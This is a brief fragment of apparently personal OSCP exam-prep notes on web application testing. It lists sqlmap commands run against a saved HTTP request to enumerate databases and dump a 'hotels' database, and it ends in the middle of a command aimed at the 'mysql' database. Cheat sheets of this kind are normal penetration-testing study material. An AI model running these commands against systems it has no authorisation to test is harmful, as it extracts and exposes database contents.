Notes from oscp.adot8.com — web applications. web applications adot8 # SQLMap ``` sqlmap -r req --batch sqlmap -r req --dbs sqlmap -r req -D hotels --dump sqlmap -r req -D mysql